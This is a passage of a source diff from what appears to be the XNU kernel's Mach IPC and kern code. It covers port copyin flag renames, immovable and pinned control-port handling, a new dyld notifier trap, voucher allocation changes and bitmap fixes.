ipc_entry_bits_t bits; ipc_port_t port; kern_return_t kr; - boolean_t deadok = flags & IPC_RIGHT_COPYIN_FLAGS_DEADOK? 
TRUE : FALSE; - boolean_t allow_imm_send = flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND? TRUE : FALSE; + boolean_t deadok = !!(flags & IPC_OBJECT_COPYIN_FLAGS_DEADOK); + boolean_t allow_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); + boolean_t soft_fail_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND); *releasep = IP_NULL; *assertcntp = 0; @@ -2136,7 +2152,7 @@ ipc_right_copyin( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; *releasep = port; goto copy_dead; @@ -2152,9 +2168,13 @@ ipc_right_copyin( } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if (!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } ipc_port_copy_send_locked(port); @@ -2183,7 +2203,7 @@ ipc_right_copyin( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; *releasep = port; goto move_dead; @@ -2193,15 +2213,18 @@ ipc_right_copyin( if ((bits & MACH_PORT_TYPE_SEND) == 0) { assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE); assert(port->ip_sorights > 0); - ip_unlock(port); goto invalid_right; } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if 
(!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } if (IE_BITS_UREFS(bits) == 1) { @@ -2211,6 +2234,7 @@ ipc_right_copyin( assert(port->ip_receiver == space); assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_RECEIVE); + assert(port->ip_pinned == 0); ip_reference(port); } else { @@ -2281,9 +2305,13 @@ ipc_right_copyin( } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if (!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE); @@ -2392,7 +2420,7 @@ ipc_right_copyin_two_move_sends( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { *releasep = port; goto invalid_right; } @@ -2520,7 +2548,7 @@ ipc_right_copyin_two( ipc_object_t object_two; kr = ipc_right_copyin(space, name, entry, - msgt_one, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, + msgt_one, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, objectp, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2539,7 +2567,7 @@ ipc_right_copyin_two( * receive right. 
*/ kr = ipc_right_copyin(space, name, entry, - msgt_two, IPC_RIGHT_COPYIN_FLAGS_NONE, + msgt_two, IPC_OBJECT_COPYIN_FLAGS_NONE, &object_two, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2579,7 +2607,7 @@ ipc_right_copyin_two( } kr = ipc_right_copyin(space, name, entry, - msgt_name, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, + msgt_name, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, objectp, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2626,6 +2654,7 @@ ipc_right_copyout( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, ipc_object_t object) @@ -2642,6 +2671,12 @@ ipc_right_copyout( port = ip_object_to_port(object); + if (pinned_control_port_enabled && (flags & IPC_OBJECT_COPYOUT_FLAGS_PINNED)) { + assert(!port->ip_pinned); + assert(port->ip_immovable_send); + port->ip_pinned = 1; + } + switch (msgt_name) { case MACH_MSG_TYPE_PORT_SEND_ONCE: diff --git a/osfmk/ipc/ipc_right.h b/osfmk/ipc/ipc_right.h index a3049efc7..fcaefbad6 100644 --- a/osfmk/ipc/ipc_right.h +++ b/osfmk/ipc/ipc_right.h @@ -74,13 +74,6 @@ #define ipc_right_lookup_read ipc_right_lookup_write #define ipc_right_lookup_two_read ipc_right_lookup_two_write -typedef uint32_t ipc_right_copyin_flags_t; - -#define IPC_RIGHT_COPYIN_FLAGS_NONE 0x0 -#define IPC_RIGHT_COPYIN_FLAGS_DEADOK 0x1 -#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x2 -#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE 0x4 /* allow copyin of a send once right to a dead port with no dead name requests */ - /* Find an entry in a space, given the name */ extern kern_return_t ipc_right_lookup_write( ipc_space_t space, @@ -96,7 +89,7 @@ extern kern_return_t ipc_right_lookup_two_write( ipc_entry_t *entryp2); /* Translate (space, object) -> (name, entry) */ -extern boolean_t ipc_right_reverse( +extern bool ipc_right_reverse( ipc_space_t space, ipc_object_t 
object, mach_port_name_t *namep, @@ -123,9 +116,7 @@ extern ipc_port_t ipc_right_request_cancel( ipc_right_request_cancel((space), (port), (name), (entry))) /* Check if an entry is being used */ -extern boolean_t ipc_right_inuse( - ipc_space_t space, - mach_port_name_t name, +extern bool ipc_right_inuse( ipc_entry_t entry); /* Check if the port has died */ @@ -134,7 +125,7 @@ extern boolean_t ipc_right_check( ipc_port_t port, mach_port_name_t name, ipc_entry_t entry, - ipc_right_copyin_flags_t flags); + ipc_object_copyin_flags_t flags); /* Clean up an entry in a dead space */ extern void ipc_right_terminate( @@ -193,7 +184,7 @@ extern kern_return_t ipc_right_copyin( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, - ipc_right_copyin_flags_t flags, + ipc_object_copyin_flags_t flags, ipc_object_t *objectp, ipc_port_t *sorightp, ipc_port_t *releasep, @@ -218,6 +209,7 @@ extern kern_return_t ipc_right_copyout( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, ipc_object_t object); diff --git a/osfmk/ipc/ipc_types.h b/osfmk/ipc/ipc_types.h index f5fde0dae..ce2eb4664 100644 --- a/osfmk/ipc/ipc_types.h +++ b/osfmk/ipc/ipc_types.h @@ -63,10 +63,16 @@ typedef struct ipc_kmsg *ipc_kmsg_t; typedef uint8_t sync_qos_count_t; typedef uint64_t ipc_label_t; -#define IPC_LABEL_NONE ((ipc_label_t)0x0) -#define IPC_LABEL_DEXT ((ipc_label_t)0x1) -#define IPC_LABEL_PLATFORM ((ipc_label_t)0x2) -#define IPC_LABEL_SPECIAL ((ipc_label_t)0x3) +#define IPC_LABEL_NONE ((ipc_label_t)0x0000) +#define IPC_LABEL_DEXT ((ipc_label_t)0x0001) +#define IPC_LABEL_PLATFORM ((ipc_label_t)0x0002) +#define IPC_LABEL_SPECIAL ((ipc_label_t)0x0003) +#define IPC_LABEL_SPACE_MASK ((ipc_label_t)0x00ff) + +#define IPC_LABEL_SUBST_TASK ((ipc_label_t)0x0100) +#define IPC_LABEL_SUBST_THREAD ((ipc_label_t)0x0200) +#define IPC_LABEL_SUBST_ONCE ((ipc_label_t)0x0300) 
+#define IPC_LABEL_SUBST_MASK ((ipc_label_t)0xff00) typedef struct ipc_kobject_label *ipc_kobject_label_t; diff --git a/osfmk/ipc/ipc_voucher.c b/osfmk/ipc/ipc_voucher.c index 4a753c737..f8673f325 100644 --- a/osfmk/ipc/ipc_voucher.c +++ b/osfmk/ipc/ipc_voucher.c @@ -364,7 +364,7 @@ unsafe_convert_port_to_voucher( * keeps the voucher bound to the port (and active). */ if (ip_kotype(port) == IKOT_VOUCHER) { - return (uintptr_t)port->ip_kobject; + return (uintptr_t)ipc_kobject_get(port); } } return (uintptr_t)IV_NULL; @@ -492,7 +492,7 @@ convert_voucher_to_port(ipc_voucher_t voucher) * if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&voucher->iv_port, - (ipc_kobject_t)voucher, IKOT_VOUCHER, false, 0)) { + (ipc_kobject_t)voucher, IKOT_VOUCHER, IPC_KOBJECT_ALLOC_NONE, false, 0)) { ipc_voucher_release(voucher); } return voucher->iv_port; @@ -706,7 +706,7 @@ convert_voucher_attr_control_to_port(ipc_voucher_attr_control_t control) * ipc_voucher_attr_control_notify if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&control->ivac_port, - (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, false, 0)) { + (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, IPC_KOBJECT_ALLOC_NONE, false, 0)) { ivac_release(control); } return control->ivac_port; @@ -2876,7 +2876,7 @@ struct user_data_value_element { iv_index_t e_sum; iv_index_t e_hash; queue_chain_t e_hash_link; - uint8_t e_data[]; + uint8_t *e_data; }; typedef struct user_data_value_element *user_data_element_t; @@ -2967,6 +2967,13 @@ ipc_voucher_attr_control_t test_control; #define USER_DATA_ASSERT_KEY(key) assert(MACH_VOUCHER_ATTR_KEY_TEST == (key)) #endif +static void +user_data_value_element_free(user_data_element_t elem) +{ + kheap_free(KHEAP_DATA_BUFFERS, elem->e_data, elem->e_size); + kfree(elem, sizeof(struct user_data_value_element)); +} + /* * Routine: user_data_release_value * Purpose: @@ -2996,7 +3003,7 @@ user_data_release_value( if (sync == elem->e_made) { 
queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link); user_data_unlock(); - kfree(elem, sizeof(*elem) + elem->e_size); + user_data_value_element_free(elem); return KERN_SUCCESS; } assert(sync < elem->e_made); @@ -3076,7 +3083,7 @@ retry: user_data_unlock(); if (NULL != alloc) { - kfree(alloc, sizeof(*alloc) + content_size); + user_data_value_element_free(alloc); } return elem; @@ -3086,11 +3093,12 @@ retry: if (NULL == alloc) { user_data_unlock(); - alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size); + alloc = kalloc(sizeof(struct user_data_value_element)); alloc->e_made = 1; alloc->e_size = content_size; alloc->e_sum = sum; alloc->e_hash = hash; + alloc->e_data = kheap_alloc(KHEAP_DATA_BUFFERS, content_size, Z_WAITOK | Z_NOFAIL); memcpy(alloc->e_data, content, content_size); goto retry; } diff --git a/osfmk/ipc/mach_debug.c b/osfmk/ipc/mach_debug.c index 903fc3bde..6ad851ac5 100644 --- a/osfmk/ipc/mach_debug.c +++ b/osfmk/ipc/mach_debug.c @@ -203,7 +203,7 @@ mach_port_space_info( } #if !(DEVELOPMENT || DEBUG) && CONFIG_MACF - const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task) == 0); + const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0); #else const boolean_t dbg_ok = TRUE; #endif diff --git a/osfmk/ipc/mach_kernelrpc.c b/osfmk/ipc/mach_kernelrpc.c index 66263ba91..49eb98146 100644 --- a/osfmk/ipc/mach_kernelrpc.c +++ b/osfmk/ipc/mach_kernelrpc.c @@ -37,6 +37,7 @@ #include #include #include +#include kern_return_t mach_port_get_attributes( @@ -46,6 +47,8 @@ mach_port_get_attributes( mach_port_info_t info, mach_msg_type_number_t *count); +extern lck_mtx_t g_dyldinfo_mtx; + int _kernelrpc_mach_vm_allocate_trap(struct _kernelrpc_mach_vm_allocate_trap_args *args) { @@ -281,7 +284,7 @@ _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_ } rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly, - (ipc_object_t *)&port, 0, NULL, 
IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (ipc_object_t *)&port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (rv != KERN_SUCCESS) { goto done; } @@ -302,7 +305,7 @@ done: int _kernelrpc_mach_port_get_attributes_trap(struct _kernelrpc_mach_port_get_attributes_args *args) { - task_inspect_t task = port_name_to_task_read_no_eval(args->target); + task_read_t task = port_name_to_task_read_no_eval(args->target); int rv = MACH_SEND_INVALID_DEST; mach_msg_type_number_t count; @@ -538,10 +541,8 @@ _kernelrpc_mach_port_request_notification_trap( // thread-argument-passing and its value should not be garbage current_thread()->ith_knote = ITH_KNOTE_NULL; rv = ipc_object_copyout(task->itk_space, ip_to_object(previous), - MACH_MSG_TYPE_PORT_SEND_ONCE, NULL, NULL, &previous_name); + MACH_MSG_TYPE_PORT_SEND_ONCE, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &previous_name); if (rv != KERN_SUCCESS) { - ipc_object_destroy(ip_to_object(previous), - MACH_MSG_TYPE_PORT_SEND_ONCE); goto done; } } @@ -665,3 +666,187 @@ done: ipc_voucher_release(voucher); return kr; } + +/* + * Mach Trap: task_dyld_process_info_notify_get_trap + * + * Return an array of active dyld notifier port names for current_task(). User + * is responsible for allocating the memory for the mach port names array + * and deallocating the port names inside the array returned. + * + * Does not consume any reference. + * + * Args: + * names_addr: Address for mach port names array. (In param only) + * names_count_addr: Number of active dyld notifier ports. (In-Out param) + * In: Number of slots available for copyout in caller + * Out: Actual number of ports copied out + * + * Returns: + * + * KERN_SUCCESS: A valid namesCnt is returned. (Can be zero) + * KERN_INVALID_ARGUMENT: Arguments are invalid. + * KERN_MEMORY_ERROR: Memory copyio operations failed. + * KERN_NO_SPACE: User allocated memory for port names copyout is insufficient. + * + * Other error code see task_info(). 
+ */ +kern_return_t +task_dyld_process_info_notify_get_trap(struct task_dyld_process_info_notify_get_trap_args *args) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + mach_port_name_t copyout_names[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + ipc_port_t copyout_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t copyout_count = 0, release_count = 0, active_count = 0; + mach_vm_address_t ports_addr; /* a user space address */ + mach_port_name_t new_name; + natural_t user_names_count = 0; + ipc_port_t sright; + kern_return_t kr; + ipc_port_t *portp; + ipc_entry_t entry; + + if ((mach_port_name_array_t)args->names_addr == NULL || (natural_t *)args->names_count_addr == NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = copyin((vm_map_address_t)args->names_count_addr, &user_names_count, sizeof(natural_t)); + if (kr) { + return KERN_MEMORY_FAILURE; + } + + if (user_names_count == 0) { + return KERN_NO_SPACE; + } + + kr = task_info(current_task(), TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user64_dyld_all_image_infos, notifyMachPorts)); + } + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(current_task()); + + if (current_task()->itk_dyld_notify == NULL) { + itk_unlock(current_task()); + (void)copyoutmap_atomic32(current_task()->map, MACH_PORT_NULL, (vm_map_address_t)ports_addr); /* reset magic */ + lck_mtx_unlock(&g_dyldinfo_mtx); + + kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t)); + return kr ? 
KERN_MEMORY_ERROR : KERN_SUCCESS; + } + + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &current_task()->itk_dyld_notify[slot]; + if (*portp == IPC_PORT_NULL) { + continue; + } else { + sright = ipc_port_copy_send(*portp); + if (IP_VALID(sright)) { + copyout_ports[active_count++] = sright; /* donates */ + sright = IPC_PORT_NULL; + } else { + release_ports[release_count++] = *portp; /* donates */ + *portp = IPC_PORT_NULL; + } + } + } + + task_dyld_process_info_update_helper(current_task(), active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + for (int i = 0; i < active_count; i++) { + sright = copyout_ports[i]; /* donates */ + copyout_ports[i] = IPC_PORT_NULL; + + assert(IP_VALID(sright)); + ip_reference(sright); + /* + * Below we consume each send right in copyout_ports, and if copyout_send + * succeeds, replace it with a port ref; otherwise release the port ref. + * + * We can reuse copyout_ports array for this purpose since + * copyout_count <= active_count. 
+ */ + new_name = ipc_port_copyout_send(sright, current_space()); /* consumes */ + if (MACH_PORT_VALID(new_name)) { + copyout_names[copyout_count] = new_name; + copyout_ports[copyout_count] = sright; /* now holds port ref */ + copyout_count++; + } else { + ip_release(sright); + } + } + + assert(copyout_count <= active_count); + + if (user_names_count < copyout_count) { + kr = KERN_NO_SPACE; + goto copyout_failed; + } + + /* copyout to caller's local copy */ + kr = copyout(copyout_names, (vm_map_address_t)args->names_addr, + copyout_count * sizeof(mach_port_name_t)); + if (kr) { + kr = KERN_MEMORY_ERROR; + goto copyout_failed; + } + + kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t)); + if (kr) { + kr = KERN_MEMORY_ERROR; + goto copyout_failed; + } + + /* now, release port refs on copyout_ports */ + for (int i = 0; i < copyout_count; i++) { + sright = copyout_ports[i]; + assert(IP_VALID(sright)); + ip_release(sright); + } + + return KERN_SUCCESS; + + +copyout_failed: + /* + * No locks are held beyond this point. + * + * Release port refs on copyout_ports, and deallocate ports that we copied out + * earlier. 
+ */ + for (int i = 0; i < copyout_count; i++) { + sright = copyout_ports[i]; + assert(IP_VALID(sright)); + + if (ipc_right_lookup_write(current_space(), copyout_names[i], &entry)) { + /* userspace has deallocated the name we copyout */ + ip_release(sright); + continue; + } + /* space is locked and active */ + if (entry->ie_object == ip_to_object(sright) || + IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_DEAD_NAME) { + (void)ipc_right_dealloc(current_space(), copyout_names[i], entry); /* unlocks space */ + } else { + is_write_unlock(current_space()); + } + + /* space is unlocked */ + ip_release(sright); + } + + return kr; +} diff --git a/osfmk/ipc/mach_msg.c b/osfmk/ipc/mach_msg.c index 0ed0d9332..f07341365 100644 --- a/osfmk/ipc/mach_msg.c +++ b/osfmk/ipc/mach_msg.c @@ -79,7 +79,6 @@ #include #include -#include #include #include #include @@ -795,7 +794,7 @@ msg_receive_error( } } -static mach_msg_fetch_filter_policy_cbfunc_t mach_msg_fetch_filter_policy_callback = NULL; +static SECURITY_READ_ONLY_LATE(mach_msg_fetch_filter_policy_cbfunc_t) mach_msg_fetch_filter_policy_callback = NULL; kern_return_t mach_msg_filter_register_callback( diff --git a/osfmk/ipc/mach_port.c b/osfmk/ipc/mach_port.c index 2c0a4d854..deaa574ac 100644 --- a/osfmk/ipc/mach_port.c +++ b/osfmk/ipc/mach_port.c @@ -80,7 +80,6 @@ #include #include #include -#include #include #include #include @@ -1844,7 +1843,8 @@ mach_port_extract_right( } kr = ipc_object_copyin(space, name, msgt_name, (ipc_object_t *) poly, 0, NULL, - IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (space == current_space() && msgt_name == MACH_MSG_TYPE_COPY_SEND) ? + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND : IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND); if (kr == KERN_SUCCESS) { *polyPoly = ipc_object_copyin_type(msgt_name); @@ -2473,6 +2473,30 @@ mach_port_guard_exception( thread_guard_violation(t, code, subcode, fatal); } +/* + * Temporary wrapper for immovable mach port guard exception. 
+ * + * Condition: !(ip_is_control(port) && !immovable_control_port_enabled) + */ +void +mach_port_guard_exception_immovable( + mach_port_name_t name, + mach_port_t port, + uint64_t portguard) +{ + if (ip_is_control(port) && immovable_control_port_enabled) { + mach_port_guard_exception(name, 0, portguard, + ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD ? + kGUARD_EXC_IMMOVABLE : kGUARD_EXC_IMMOVABLE_NON_FATAL); + } else if (!ip_is_control(port)) { + /* always fatal exception for non-control port violation */ + mach_port_guard_exception(name, 0, portguard, kGUARD_EXC_IMMOVABLE); + } else { + /* ip_is_control(port) && !immovable_control_port_enabled */ + panic("mach_port_guard_exception_immovable: condition does not hold."); + } +} + /* * Routine: mach_port_guard_ast diff --git a/osfmk/ipc/port.h b/osfmk/ipc/port.h index 5b24a9885..852a850b5 100644 --- a/osfmk/ipc/port.h +++ b/osfmk/ipc/port.h @@ -92,6 +92,11 @@ extern void mach_port_guard_exception( uint64_t inguard, uint64_t portguard, unsigned reason); + +extern void mach_port_guard_exception_immovable( + mach_port_name_t name, + mach_port_t port, + uint64_t portguard); __END_DECLS #endif /* _IPC_PORT_H_ */ diff --git a/osfmk/kdp/kdp_dyld.h b/osfmk/kdp/kdp_dyld.h index 289c5d4d0..ecfaf24dc 100644 --- a/osfmk/kdp/kdp_dyld.h +++ b/osfmk/kdp/kdp_dyld.h @@ -35,6 +35,9 @@ #define DYLD_ALL_IMAGE_INFOS_ADDRESS_MINIMUM_VERSION 9 #define DYLD_ALL_IMAGE_INFOS_TIMESTAMP_MINIMUM_VERSION 15 +#define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8 +#define DYLD_PROCESS_INFO_NOTIFY_MAGIC 0x49414E46 + /* Re-use dyld format for kext load addresses */ #if __LP64__ typedef struct user64_dyld_uuid_info kernel_uuid_info; @@ -90,7 +93,9 @@ struct user32_dyld_all_image_infos { /* the following field is only in version 15 (Mac OS X 10.12, iOS 10.0) and later */ user32_addr_t sharedCacheBaseAddress; uint64_t timestamp; - user32_addr_t reserved[14]; + user32_addr_t dyldpath; + mach_port_name_t 
notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + user32_addr_t reserved[5]; /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */ user32_addr_t compact_dyld_image_info_addr; user32_size_t compact_dyld_image_info_size; @@ -128,7 +133,9 @@ struct user64_dyld_all_image_infos { /* the following field is only in version 15 (macOS 10.12, iOS 10.0) and later */ user64_addr_t sharedCacheBaseAddress; uint64_t timestamp; - user64_addr_t reserved[14]; + user64_addr_t dyldPath; + mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + user64_addr_t reserved[9]; /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */ user64_addr_t compact_dyld_image_info_addr; user64_size_t compact_dyld_image_info_size; diff --git a/osfmk/kdp/ml/arm/kdp_machdep.c b/osfmk/kdp/ml/arm/kdp_machdep.c index 42b755900..2ef4d343d 100644 --- a/osfmk/kdp/ml/arm/kdp_machdep.c +++ b/osfmk/kdp/ml/arm/kdp_machdep.c @@ -623,21 +623,30 @@ machine_trace_thread64(thread_t thread, pc = get_saved_state_pc(state); sp = get_saved_state_sp(state); } else { - /* kstackptr may not always be there, so recompute it */ - struct arm_kernel_saved_state * state = &thread_get_kernel_state(thread)->machine.ss; - stacklimit = VM_MAX_KERNEL_ADDRESS; - stacklimit_bottom = VM_MIN_KERNEL_ADDRESS; - bt_vm_map = kernel_map; + struct arm_saved_state *state = thread->machine.kpcb; + if (state != NULL) { + if (fp == 0) { + fp = state->ss_64.fp; + } - /* Get the frame pointer */ - if (fp == 0) { - fp = state->fp; + prevlr = state->ss_64.lr; + pc = state->ss_64.pc; + sp = state->ss_64.sp; + } else { + /* kstackptr may not always be there, so recompute it */ + arm_kernel_saved_state_t *kstate = &thread_get_kernel_state(thread)->machine.ss; + + if (fp == 0) { + fp = kstate->fp; + } + prevlr = kstate->lr; + pc = kstate->pc; + sp = kstate->sp; } - /* Fill in the current link register */ - prevlr = state->lr; - pc = state->pc; - sp = state->sp; + stacklimit = 
VM_MAX_KERNEL_ADDRESS; + stacklimit_bottom = VM_MIN_KERNEL_ADDRESS; + bt_vm_map = kernel_map; } if (!user_p && !prevlr && !fp && !sp && !pc) { diff --git a/osfmk/kern/Makefile b/osfmk/kern/Makefile index 7d2ddfc5e..42da7337b 100644 --- a/osfmk/kern/Makefile +++ b/osfmk/kern/Makefile @@ -39,10 +39,12 @@ EXPORT_FILES = \ circle_queue.h \ clock.h \ coalition.h \ + counter.h \ cpu_number.h \ cpu_data.h \ energy_perf.h \ extmod_statistics.h \ + hv_io_notifier.h \ hv_support.h \ hv_support_kext.h \ ipc_mig.h \ @@ -56,6 +58,7 @@ EXPORT_FILES = \ locks.h \ lock_group.h \ host.h \ + hvg_hypercall.h \ mach_param.h \ macro_help.h \ mpqueue.h \ diff --git a/osfmk/kern/ast.c b/osfmk/kern/ast.c index d0e341529..0c38b3a26 100644 --- a/osfmk/kern/ast.c +++ b/osfmk/kern/ast.c @@ -55,7 +55,7 @@ */ #include -#include +#include #include #include #include @@ -132,8 +132,6 @@ ast_taken_kernel(void) assert(urgent_reason & AST_PREEMPT); - counter(c_ast_taken_block++); - thread_block_reason(THREAD_CONTINUE_NULL, NULL, urgent_reason); assert(ml_get_interrupts_enabled() == FALSE); @@ -311,7 +309,6 @@ ast_taken_user(void) #endif if (preemption_reasons & AST_PREEMPT) { - counter(c_ast_taken_block++); /* switching to a continuation implicitly re-enables interrupts */ thread_block_reason(thread_preempted, NULL, preemption_reasons); /* NOTREACHED */ diff --git a/osfmk/kern/audit_sessionport.c b/osfmk/kern/audit_sessionport.c index 991941f57..62b671d9e 100644 --- a/osfmk/kern/audit_sessionport.c +++ b/osfmk/kern/audit_sessionport.c @@ -59,7 +59,7 @@ audit_session_mksend(struct auditinfo_addr *aia_p, ipc_port_t *sessionport) { audit_session_aiaref(aia_p); if (!ipc_kobject_make_send_lazy_alloc_port(sessionport, - (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, false, 0)) { + (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, IPC_KOBJECT_ALLOC_NONE, false, 0)) { audit_session_aiaunref(aia_p); } diff --git a/osfmk/kern/bits.h b/osfmk/kern/bits.h index 89012eb5a..045ed9621 100644 --- a/osfmk/kern/bits.h +++ 
b/osfmk/kern/bits.h @@ -312,9 +312,17 @@ bitmap_first(bitmap_t *map, uint nbits) inline static void bitmap_not(bitmap_t *out, const bitmap_t *in, uint nbits) { - for (uint i = 0; i <= bitmap_index(nbits - 1); i++) { + uint i; + + for (i = 0; i < bitmap_index(nbits - 1); i++) { out[i] = ~in[i]; } + + uint nbits_complete = i * 64; + + if (nbits > nbits_complete) { + out[i] = ~in[i] & mask(nbits - nbits_complete); + } } inline static void @@ -328,9 +336,17 @@ bitmap_and(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits) inline static void bitmap_and_not(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits) { - for (uint i = 0; i <= bitmap_index(nbits - 1); i++) { + uint i; + + for (i = 0; i < bitmap_index(nbits - 1); i++) { out[i] = in1[i] & ~in2[i]; } + + uint nbits_complete = i * 64; + + if (nbits > nbits_complete) { + out[i] = (in1[i] & ~in2[i]) & mask(nbits - nbits_complete); + } } inline static bool diff --git a/osfmk/kern/bsd_kern.c b/osfmk/kern/bsd_kern.c index cb46e621b..aafd71301 100644 --- a/osfmk/kern/bsd_kern.c +++ b/osfmk/kern/bsd_kern.c @@ -324,7 +324,7 @@ get_task_map_reference(task_t t) return VM_MAP_NULL; } m = t->map; - vm_map_reference_swap(m); + vm_map_reference(m); task_unlock(t); return m; } @@ -768,6 +768,12 @@ get_vmmap_size( { return vm_map_adjusted_size(map); } +int +get_task_page_size( + task_t task) +{ + return vm_map_page_size(task->map); +} #if CONFIG_COREDUMP @@ -1016,7 +1022,7 @@ fill_taskprocinfo(task_t task, struct proc_taskinfo_internal * ptinfo) ptinfo->pti_threads_system = tinfo.threads_system; ptinfo->pti_threads_user = tinfo.threads_user; - ptinfo->pti_faults = task->faults; + ptinfo->pti_faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX); ptinfo->pti_pageins = task->pageins; ptinfo->pti_cow_faults = task->cow_faults; ptinfo->pti_messages_sent = task->messages_sent; diff --git a/osfmk/kern/coalition.c b/osfmk/kern/coalition.c index e77ca4e68..af789e0b2 100644 --- 
